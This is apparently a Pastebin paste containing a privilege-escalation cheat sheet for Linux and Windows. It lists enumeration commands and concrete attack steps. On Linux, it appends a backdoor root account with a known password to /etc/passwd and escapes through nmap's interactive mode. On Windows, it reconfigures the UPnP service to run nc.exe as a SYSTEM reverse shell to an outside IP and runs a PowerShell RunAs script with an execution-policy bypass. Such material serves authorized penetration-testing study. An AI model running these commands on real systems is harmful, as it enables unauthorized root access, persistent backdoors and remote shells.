Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- --- Linux ---
- Website: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
- Script:
- linuxprivchecker.py
- Checking which services are run as root:
- ps aux | grep root
- Checking which jobs are scheduled:
- ls -al /etc/cron*
- Checking world-writable files:
- find /etc/ -readable -type f -perm 777 2>/dev/null
- Verifying file permissions:
- find / -perm -u=s -type f 2>/dev/null
- Nmap interactive:
- sudo nmap --interactive
- Adding an alternate root account to the /etc/passwd file:
- perl -le 'print crypt("foo", "aa")'
- echo "aa:aaKNIEDOaueR6:0:0:aa:/aa:/bin/bash" >> /etc/passwd
- Switching to the alternate root account:
- su aa
- foo
- Switching to sudoer if sudoer:
- sudo /bin/bash
- Notes:
- - Check passwd file permissions, this is usually an easy way in.
- - Check permissions on relevant important files; this usually throws errors due to improper permissions.
- --- Windows ---
- Website: http://www.fuzzysecurity.com/tutorials/16.html
- Checking the system's users:
- net users
- net user alice
- net user bethany
- Checking the running processes:
- tasklist /SVC
- Checking service configuration for a notorious insecure service:
- sc qc upnphost
- Reconfiguring the UPnP Device Host service to run a binary of choosing with SYSTEM privileges, in this case, nc.exe:
- sc qc upnphost
- sc config upnphost binPath= "C:\Users\Public\nc.exe -nv 192.168.41.31 443 -e C:\Windows\System32\cmd.exe"
- sc config upnphost obj= ".\LocalSystem" password= ""
- net start upnphost
- Using Powershell to RunAs an administrative user:
- echo $secpasswd = ConvertTo-SecureString "" -AsPlainText -Force > run.ps1
- echo $mycreds = New-Object System.Management.Automation.PSCredential ("admin", $secpasswd) >> run.ps1
- echo $computer = "DANCING-PARROT" >> run.ps1
- echo [System.Diagnostics.Process]::Start("C:\xampp\webdav\rev.exe","", >> run.ps1
- echo $mycreds.Username, $mycreds.Password, $computer) >> run.ps1
- powershell -ExecutionPolicy Bypass -File run.ps1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement